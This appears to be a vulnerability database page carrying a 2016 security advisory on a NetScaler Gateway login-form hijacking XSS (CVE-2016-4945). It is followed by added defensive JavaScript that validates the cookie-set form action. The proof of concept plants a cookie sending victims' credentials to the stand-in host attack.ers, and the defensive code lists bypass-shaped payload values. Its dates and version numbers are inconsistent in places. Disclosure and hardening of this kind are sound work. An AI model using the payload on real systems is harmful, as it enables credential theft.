Citrix Netscaler 11.0 Build 64.35 Cross Site Scripting

Published: 27 May 2016 00:00:00. Reported by Dr. Daniel Schliebner. Type: packetstorm. Source: packetstormsecurity.com. 170 views.

Citrix Netscaler Cross Site Scripting Vulnerability in 11.0 Build 64.3

Related entries

| Family | Title | Published | Reporter |
|---|---|---|---|
| CNVD | Citrix NetScaler Gateway Clickjacking Vulnerability | 31 May 2016 00:00 | cnvd |
| CVE | CVE-2016-4945 | 1 Jun 2016 22:00 | cve |
| Cvelist | CVE-2016-4945 | 1 Jun 2016 22:00 | cvelist |
| EUVD | EUVD-2016-5920 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2016-4945 | 1 Jun 2016 22:59 | nvd |
| OpenVAS | Citrix NetScaler Gateway Login Form Hijacking Vulnerability (CTX213313) | 30 May 2016 00:00 | openvas |
| Prion | Cross site scripting | 1 Jun 2016 22:59 | prion |
| VulnCheck KEV | VulnCheck KEV: CVE-2016-4945 | 16 Jul 2024 00:00 | vulncheck_kev |
PERSICON Security Advisory
=======================================================================  
Title: Login Form Hijacking vulnerability  
Product: Citrix Netscaler  
Vulnerable Version: 11.0 Build 64.35  
Fixed Version: 11.0 Build 66.11  
CVE-ID: CVE-2016-4945  
Impact: medium  
found: 2015-04-07  
by: Dr. Daniel Schliebner <[email protected]>  
http://www.persicon.com  
=======================================================================  
  
Vendor Description:  
-------------------  
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations  
and things are securely connected and accessible to make the   
extraordinary possible. Its technology makes the world's apps and   
data secure and easy to access, empowering people to work anywhere   
and at any time. Citrix provides a complete and integrated portfolio   
of Workspace-as-a-Service, application delivery, virtualization, mobility,   
network delivery and file sharing solutions that enables IT to ensure   
critical systems are securely available to users via the cloud or   
on-premise and across any device or platform. With annual revenue   
in 2015 of $3.28 billion, Citrix solutions are in use by more than   
400,000 organizations and over 100 million users globally."   
(https://www.citrix.com/about.html)  
  
  
Vulnerability Description:  
--------------------------  
The login page of the Citrix Netscaler Gateway web frontend is   
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due  
to improper sanitization of the content of the "NSC_TMAC" cookie.  
  
The vulnerability is located in the file   
  
/vpn/js/gateway_login_form_view.js  
  
in which the cookie's content is - if set - written to the DOM
via JavaScript. This is done in the following excerpt:

var cookie_action = ns_getcookie("NSC_TMAC");
var action_url = '/cgi/login';
if (cookie_action) {
    /* the cookie value is used verbatim as the login form's action */
    action_url = cookie_action;
    UnsetCookie("NSC_TMAC");
}
  
This vulnerability can be exploited by an unauthorized remote attacker
by forging the destination address of the login form in order to
receive a victim's login credentials. The required cookie can be planted,
for example, through another XSS vulnerability on the company's web site.
  
  
Proof of concept:  
-----------------  
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.
Assume further that an attacker is able to set a cookie on a victim's client
via some other attack vector, e.g. another XSS vulnerability.
  
The attacker needs to first (e.g. by XSS) execute the following code  
on the client:  
  
<script>  
document.cookie='NSC_TMAC=https://attack.ers/receive/;' +   
' domain=.my-foobar-company.com';  
window.location.href='https://my-foobar-company.com/vpn/'  
</script>  
  
As a consequence, the Netscaler Gateway login form has the URL
"https://attack.ers/receive/" as the value of its "action" attribute,
and hence a victim will send its credentials to the attacker's
host when submitting the form.
  
  
Vulnerable / tested versions:  
-----------------------------  
Citrix Netscaler 11.0 Build 65.31  
Citrix Netscaler 11.0 Build 64.34  
  
  
Vendor contact timeline:  
------------------------  
2016-04-11: Contacting vendor through [email protected]
2015-04-11: Vendor response - issue has now the case ID CASE-6597 and will be forwarded for feedback
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory
  
  
Solution:  
---------  
Remove the use of the cookie content or sanitize its content properly  
before writing it to the DOM.  
  
  
References  
----------  
[1] http://support.citrix.com/article/CTX213313  
  
  
URL  
---  
http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.txt
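The advisory's Solution section asks for the cookie content to be dropped or validated before it reaches the DOM. The following is an added example, not NetScaler's code and not part of the advisory: it places the vulnerable pattern from the `gateway_login_form_view.js` excerpt beside a hardened replacement that only accepts an allow-listed, same-origin path. The NetScaler helpers `ns_getcookie()` and `UnsetCookie()` are replaced by a small stand-alone cookie parser so the block runs under Node without a browser; the gateway origin is taken from the advisory's example host, and the allow-list of form targets is constructed here (only `/cgi/login` appears on the page). The sample cookie values are constructed from the advisory's PoC plus common validator-bypass shapes that a defender's check must also reject.

```javascript
// Added example (not NetScaler's own code): the login-form "action"
// selection from the advisory, in its vulnerable form and a hardened form.
// ns_getcookie()/UnsetCookie() from gateway_login_form_view.js are replaced
// by a stand-alone cookie parser so this runs under Node without a DOM.

const DEFAULT_ACTION = '/cgi/login';

// Assumed gateway origin, taken from the advisory's example host.
const GATEWAY_ORIGIN = 'https://my-foobar-company.com';

// Constructed allow-list of form targets the login page may post to.
// Only /cgi/login appears in the advisory; a real deployment would list
// its actual login endpoints here.
const ALLOWED_ACTION_PATHS = new Set(['/cgi/login']);

// Parse a document.cookie-style string ("a=1; b=2") into a name->value map.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of cookieString.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    const name = part.slice(0, eq).trim();
    if (name) jar[name] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Vulnerable pattern (mirrors the advisory excerpt): whatever NSC_TMAC
// holds becomes the form action, so an attacker-set cookie redirects
// the submitted credentials to a host of the attacker's choosing.
function resolveActionVulnerable(cookieString) {
  const cookieAction = parseCookies(cookieString).NSC_TMAC;
  return cookieAction ? cookieAction : DEFAULT_ACTION;
}

// Return a normalized same-origin path for `candidate`, or null if the
// value is not an allow-listed path on the gateway's own origin.
function safeActionPath(candidate, origin) {
  if (typeof candidate !== 'string' || candidate === '') return null;
  // Absolute URLs, "javascript:" and scheme-relative "//host" are rejected
  // up front; only a value with a single leading "/" gets any further.
  if (!candidate.startsWith('/') || candidate.startsWith('//')) return null;
  let url;
  try {
    // The WHATWG URL parser resolves "." and ".." segments (including their
    // %2e forms) and, for https, treats "\" like "/", so "/\host" becomes
    // "//host"; the checks below therefore see the real target.
    url = new URL(candidate, origin);
  } catch (e) {
    return null;
  }
  if (url.origin !== origin) return null;
  if (!ALLOWED_ACTION_PATHS.has(url.pathname)) return null;
  // Query string and fragment are dropped: nothing cookie-controlled
  // reaches the DOM except the vetted path itself.
  return url.pathname;
}

// Hardened replacement: validate the cookie value, otherwise fall back.
function resolveActionHardened(cookieString, origin = GATEWAY_ORIGIN) {
  const path = safeActionPath(parseCookies(cookieString).NSC_TMAC, origin);
  return path === null ? DEFAULT_ACTION : path;
}

// Constructed cookie values (the advisory's PoC value plus common bypass
// shapes), run through both resolvers for comparison.
const SAMPLES = [
  'NSC_TMAC=https://attack.ers/receive/',
  'NSC_TMAC=//attack.ers/receive/',
  'NSC_TMAC=/\\attack.ers/receive/',
  'NSC_TMAC=javascript:alert(1)',
  'NSC_TMAC=/vpn/../cgi/login?next=x',
  'NSC_TMAC=/cgi/login',
  '',
];

for (const c of SAMPLES) {
  console.log(JSON.stringify(c).padEnd(40),
    'vulnerable ->', resolveActionVulnerable(c).padEnd(28),
    'hardened ->', resolveActionHardened(c));
}
```

The hardened resolver deliberately validates after URL normalization rather than before: a prefix check on the raw string alone would accept `/vpn/../cgi/login` only by luck and would miss the `/\host` form, which the parser turns into a foreign origin. In the real page the cookie would still be unset after reading it, as the original excerpt does.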


Published: 27 May 2016 00:00 (current). Vulners AI Score: 6.4 (medium risk). EPSS: 0.00617. Views: 170.